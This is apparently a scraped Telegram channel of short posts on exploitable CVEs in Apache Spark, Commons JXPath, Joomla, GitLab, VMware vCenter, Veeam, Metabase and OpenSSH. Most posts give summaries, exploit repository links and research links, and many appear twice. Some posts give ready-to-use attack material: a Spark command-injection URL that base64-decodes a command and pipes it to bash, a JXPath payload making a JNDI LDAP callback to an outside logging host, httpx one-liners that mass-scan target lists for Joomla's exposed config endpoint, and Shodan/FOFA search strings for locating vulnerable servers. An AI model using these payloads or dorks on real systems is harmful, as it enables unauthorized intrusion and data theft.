💉 Apache Spark RCE (CVE-2022-33891)
Apache Spark could allow an attacker to execute arbitrary commands on the system, caused by improper input validation of code path in HttpSecurityFilter when ACSs are enabled. This affects Apache Spark versions 3.0.3 and earlier, versions 3.1.1 to 3.1.2, and versions 3.2.0 to 3.2.1.
PoC (Sleep 10):
Exploits:
https://github.com/HuskyHacks/cve-2022-33891
https://github.com/W01fh4cker/cve-2022-33891
https://github.com/west-wind/CVE-2022-33891
Shodan Dorks:
#apache #spark #rce #cve
Apache Spark could allow an attacker to execute arbitrary commands on the system, caused by improper input validation of code path in HttpSecurityFilter when ACSs are enabled. This affects Apache Spark versions 3.0.3 and earlier, versions 3.1.1 to 3.1.2, and versions 3.2.0 to 3.2.1.
PoC (Sleep 10):
https://localhost:8080/?doAs=`echo%20%22c2xlZXAgMTAK%22%20|%20base64%20-d%20|%20bash`Exploits:
https://github.com/HuskyHacks/cve-2022-33891
https://github.com/W01fh4cker/cve-2022-33891
https://github.com/west-wind/CVE-2022-33891
Shodan Dorks:
http.favicon.hash:856048515#apache #spark #rce #cve
👍11
⚙️ Apache Commons Jxpath (CVE-2022-41852)
This vulnerability affects Java library called Apache Commons JXPath, which is used for processing XPath syntax. All versions (including latest version) are affected by this vulnerability. If your application uses JXPath library, you might be vulnerable. According to CVE information, all methods for XPath processing are vulnerable, except for except compile() and compilePath(). If user can provide value for the XPath expression, it might allow him to execute code on your application server.
Payload:
https://github.com/Warxim/CVE-2022-41852
Research:
https://hackinglab.cz/en/blog/remote-code-execution-in-jxpath-library-cve-2022-41852/
#apache #commons #jxpath #cve #exploit
This vulnerability affects Java library called Apache Commons JXPath, which is used for processing XPath syntax. All versions (including latest version) are affected by this vulnerability. If your application uses JXPath library, you might be vulnerable. According to CVE information, all methods for XPath processing are vulnerable, except for except compile() and compilePath(). If user can provide value for the XPath expression, it might allow him to execute code on your application server.
Payload:
jxPathContext.getValue("javax.naming.InitialContext.doLookup(\"ldap://check.dnslog.cn/obj\")");
PoC:https://github.com/Warxim/CVE-2022-41852
Research:
https://hackinglab.cz/en/blog/remote-code-execution-in-jxpath-library-cve-2022-41852/
#apache #commons #jxpath #cve #exploit
👍9🔥2
⚙️ Joomla Web Service Endpoint Access (CVE-2023-23752)
An issue was discovered in Joomla 4.0.0 through 4.2.7. An improper access check allows unauthorized access to webservice endpoints.
PoC:
https://unsafe.sh/go-149780.html
Nuclei Template:
https://github.com/thecyberneh/nuclei-templatess/blob/main/cves/2023/CVE-2023-23752.yaml
#joomla #endpoint #access #cve
An issue was discovered in Joomla 4.0.0 through 4.2.7. An improper access check allows unauthorized access to webservice endpoints.
PoC:
httpx -l targets.txt -sc -ct -ip -path '/api/index.php/v1/config/application?public=true'Research:
https://unsafe.sh/go-149780.html
Nuclei Template:
https://github.com/thecyberneh/nuclei-templatess/blob/main/cves/2023/CVE-2023-23752.yaml
#joomla #endpoint #access #cve
👍9
💥 Fortinet FortiNAC Unauthenticated RCE
On Thursday, 16 February 2022, Fortinet released a PSIRT that details CVE-2022-39952, a critical vulnerability affecting its FortiNAC product. This vulnerability, discovered by Gwendal Guégniaud of Fortinet, allows an unauthenticated attacker to write arbitrary files on the system and as a result obtain remote code execution in the context of the root user.
PoC:
https://github.com/horizon3ai/CVE-2022-39952
Research:
https://www.horizon3.ai/fortinet-fortinac-cve-2022-39952-deep-dive-and-iocs/
#fortinet #fortinac #rce #cve
On Thursday, 16 February 2022, Fortinet released a PSIRT that details CVE-2022-39952, a critical vulnerability affecting its FortiNAC product. This vulnerability, discovered by Gwendal Guégniaud of Fortinet, allows an unauthenticated attacker to write arbitrary files on the system and as a result obtain remote code execution in the context of the root user.
PoC:
https://github.com/horizon3ai/CVE-2022-39952
Research:
https://www.horizon3.ai/fortinet-fortinac-cve-2022-39952-deep-dive-and-iocs/
#fortinet #fortinac #rce #cve
🔥4👍2❤1
Veeam Backup and Replication (CVE-2023-27532)
Vulnerability in Veeam Backup & Replication component allows encrypted credentials stored in the configuration database to be obtained. This may lead to gaining access to the backup infrastructure hosts.
Research:
https://www.horizon3.ai/veeam-backup-and-replication-cve-2023-27532-deep-dive/
Exploit 1:
https://github.com/sfewer-r7/CVE-2023-27532
Exploit 2:
https://github.com/horizon3ai/CVE-2023-27532
Exploit 3 (RCE):
https://github.com/puckiestyle/CVE-2023-27532-RCE-Only
#veeam #credentials #rce #cve
Vulnerability in Veeam Backup & Replication component allows encrypted credentials stored in the configuration database to be obtained. This may lead to gaining access to the backup infrastructure hosts.
Research:
https://www.horizon3.ai/veeam-backup-and-replication-cve-2023-27532-deep-dive/
Exploit 1:
https://github.com/sfewer-r7/CVE-2023-27532
Exploit 2:
https://github.com/horizon3ai/CVE-2023-27532
Exploit 3 (RCE):
https://github.com/puckiestyle/CVE-2023-27532-RCE-Only
#veeam #credentials #rce #cve
🔥7👍2👎2
⚙️ Joomla < 4.2.8 — Unauthenticated Information Disclosure (CVE-2023-23752)
Research:
https://vulncheck.com/blog/joomla-for-rce
Exploit:
https://github.com/Acceis/exploit-CVE-2023-23752
UPD:
Research:
https://vulncheck.com/blog/joomla-for-rce
Exploit:
https://github.com/Acceis/exploit-CVE-2023-23752
UPD:
httpx -l ip.txt -path '/api/index.php/v1/config/application?public=true'#joomla #information #disclosure #cve
🔥11👍1
🎯 GitLab CE/EE Path Traversal Vulnerability (CVE-2023-2825)
On May 23, 2023, GitLab released version 16.0.1, which addressed a critical vulnerability, CVE-2023-2825, impacting both the Community Edition (CE) and Enterprise Edition (EE) version 16.0.0. This vulnerability enables unauthenticated users to read arbitrary files by exploiting a path traversal bug. Additionally, an unauthenticated malicious user can leverage a path traversal vulnerability to read arbitrary files on the server if there is an attachment present in a public project nested within a minimum of five groups.
Shodan Dork:
https://labs.watchtowr.com/gitlab-arbitrary-file-read-gitlab-cve-2023-2825-analysis/
PoC:
https://github.com/Occamsec/CVE-2023-2825
#gitlab #path #traversal #poc #cve
On May 23, 2023, GitLab released version 16.0.1, which addressed a critical vulnerability, CVE-2023-2825, impacting both the Community Edition (CE) and Enterprise Edition (EE) version 16.0.0. This vulnerability enables unauthenticated users to read arbitrary files by exploiting a path traversal bug. Additionally, an unauthenticated malicious user can leverage a path traversal vulnerability to read arbitrary files on the server if there is an attachment present in a public project nested within a minimum of five groups.
Shodan Dork:
application-77ee44de16d2f31b4ddfd214b60b6327fe48b92df7054b1fb928fd6d4439fc7e.css
Research: https://labs.watchtowr.com/gitlab-arbitrary-file-read-gitlab-cve-2023-2825-analysis/
PoC:
https://github.com/Occamsec/CVE-2023-2825
#gitlab #path #traversal #poc #cve
👍7🔥2
This media is not supported in your browser
VIEW IN TELEGRAM
🔥 VMware vRealize Network Insight — Pre-authenticated RCE (CVE-2023-20887)
This post will examine the exploitation process of CVE-2023-20887 in VMware Aria Operations for Networks (formerly known as vRealize Network Insight). This vulnerability comprises a chain of two issues leading to Remote Code Execution (RCE) that can be exploited by unauthenticated attackers.
Exploit:
https://github.com/sinsinology/CVE-2023-20887
Research:
https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-20887/
#VMware #vRealize #rce #cve
This post will examine the exploitation process of CVE-2023-20887 in VMware Aria Operations for Networks (formerly known as vRealize Network Insight). This vulnerability comprises a chain of two issues leading to Remote Code Execution (RCE) that can be exploited by unauthenticated attackers.
Exploit:
https://github.com/sinsinology/CVE-2023-20887
Research:
https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-20887/
#VMware #vRealize #rce #cve
🔥3
Ⓜ️ Metabase Pre-auth RCE
Earlier this week, it was reported that Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 has a vulnerability that allows attackers to execute arbitrary commands on the server, at the server's privilege level. Authentication is not required for exploitation. This vulnerability was designated as CVE-2023-38646.
Research:
https://blog.calif.io/p/reproducing-cve-2023-38646-metabase
PoC:
https://gist.github.com/testanull/a7beb2777bbf550f3cf533d2794477fe
#metabase #cve #poc #rce
Earlier this week, it was reported that Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 has a vulnerability that allows attackers to execute arbitrary commands on the server, at the server's privilege level. Authentication is not required for exploitation. This vulnerability was designated as CVE-2023-38646.
Research:
https://blog.calif.io/p/reproducing-cve-2023-38646-metabase
PoC:
https://gist.github.com/testanull/a7beb2777bbf550f3cf533d2794477fe
#metabase #cve #poc #rce
🔥8👍1
⚔️ GitLab CE/EE Preauth RCE (CVE-2021-22205)
An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution.
❗️Affect Versions:
https://github.com/inspiringz/CVE-2021-22205
#gitlab #rce #cve
An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution.
❗️Affect Versions:
>=11.9, <13.8.8🌐 Source:
>=13.9, <13.9.6
>=13.10, <13.10.3
https://github.com/inspiringz/CVE-2021-22205
#gitlab #rce #cve
🔥4❤🔥2👍1
A recently discovered vulnerability, CVE-2023-36845, affects Juniper SRX firewalls and EX switches, allowing for remote code execution without writing to the disk
🔍 Scanner:
https://github.com/vulncheck-oss/cve-2023-36845-scanner
🌐 Research:
https://vulncheck.com/blog/juniper-cve-2023-36845
#juniper #rce #cve
Please open Telegram to view this post
VIEW IN TELEGRAM
❤🔥8❤1👍1
May 21st, Veeam published an advisory stating that all the versions BEFORE Veeam Backup Enterprise Manager 12.1.2.172 is affected by an authentication bypass allowing an unauthenticated attacker to bypass the authentication and log in to the Veeam Backup Enterprise Manager web interface as any user the CVSS for this vulnerability is 9.8.
🔗 Source:
https://summoning.team/blog/veeam-enterprise-manager-cve-2024-29849-auth-bypass/
🔗 PoC:
https://github.com/sinsinology/CVE-2024-29849
#veeam #authentication #bypass #cve
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥7👍2
🔥 VMware vCenter Server RCE + PrivEsc
Multiple heap-overflow vulnerabilities in the implementation of the DCE/RPC protocol. They could allow a bad actor with network access to vCenter Server to achieve remote code execution by sending a specially crafted network packet.
— CVE-2024-37079: A heap-overflow vulnerability in the DCERPC protocol implementation of vCenter Server that allows a malicious actor with network access to send specially crafted packets, potentially leading to remote code execution. (CVSS v3.1 score: 9.8 "critical");
— CVE-2024-37080: Another heap overflow vulnerability in the DCERPC protocol of vCenter Server. Similar to CVE-2024-37079, it allows an attacker with network access to exploit heap overflow by sending crafted packets, potentially resulting in remote code execution. (CVSS v3.1 score: 9.8 "critical");
— CVE-2024-37081: This vulnerability arises from a misconfiguration of sudo in vCenter Server, permitting an authenticated local user to exploit this flaw to elevate their privileges to root on the vCenter Server Appliance. (CVSS v3.1 score: 7.8 "high").
Nuclei Template (PoC):
🔗 https://gist.github.com/tothi/0ff034b254aca527c3a1283ff854592a
Shodan
FOFA
#vmware #vcenter #rce #lpe #cve
Multiple heap-overflow vulnerabilities in the implementation of the DCE/RPC protocol. They could allow a bad actor with network access to vCenter Server to achieve remote code execution by sending a specially crafted network packet.
— CVE-2024-37079: A heap-overflow vulnerability in the DCERPC protocol implementation of vCenter Server that allows a malicious actor with network access to send specially crafted packets, potentially leading to remote code execution. (CVSS v3.1 score: 9.8 "critical");
— CVE-2024-37080: Another heap overflow vulnerability in the DCERPC protocol of vCenter Server. Similar to CVE-2024-37079, it allows an attacker with network access to exploit heap overflow by sending crafted packets, potentially resulting in remote code execution. (CVSS v3.1 score: 9.8 "critical");
— CVE-2024-37081: This vulnerability arises from a misconfiguration of sudo in vCenter Server, permitting an authenticated local user to exploit this flaw to elevate their privileges to root on the vCenter Server Appliance. (CVSS v3.1 score: 7.8 "high").
Nuclei Template (PoC):
🔗 https://gist.github.com/tothi/0ff034b254aca527c3a1283ff854592a
Shodan
product:"VMware vCenter Server"
FOFA
app="vmware-vCenter"
#vmware #vcenter #rce #lpe #cve
🔥12👍3
The Qualys Threat Research Unit has discovered a Remote Unauthenticated Code Execution vulnerability in OpenSSH’s server (sshd) in glibc-based Linux systems. CVE assigned to this vulnerability is CVE-2024-6387.
The vulnerability, which is a signal handler race condition in OpenSSH’s server (sshd), allows unauthenticated remote code execution (RCE) as root on glibc-based Linux systems.
🔗 Research:
https://blog.qualys.com/vulnerabilities-threat-research/2024/07/01/regresshion-remote-unauthenticated-code-execution-vulnerability-in-openssh-server
🔗 PoC:
https://github.com/acrono/cve-2024-6387-poc
#openssh #glibc #rce #cve
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥22❤1👍1
APT
🔥 VMware vCenter Server RCE + PrivEsc Multiple heap-overflow vulnerabilities in the implementation of the DCE/RPC protocol. They could allow a bad actor with network access to vCenter Server to achieve remote code execution by sending a specially crafted…
VMware vCenter - CVE-2024-37081.pdf
1.3 MB
The vCenter Server contains multiple local privilege escalation vulnerabilities due to misconfiguration of sudo. An authenticated local user with non-administrative privileges may exploit these issues to elevate privileges to root on vCenter Server Appliance.
🔗 Source:
https://github.com/mbadanoiu/CVE-2024-37081
#vmware #vcenter #lpe #cve
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5🔥3❤1
VMware vCenter - CVE-2024-22274.pdf
1.1 MB
The vCenter Server contains an authenticated remote code execution vulnerability. A malicious actor with administrative privileges on the vCenter appliance shell may exploit this issue to run arbitrary commands on the underlying operating system as the "root" user.
🔗 Source:
https://github.com/mbadanoiu/CVE-2024-22274
https://github.com/l0n3m4n/CVE-2024-22274-RCE
#vmware #vcenter #rce #cve
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥9👍3❤2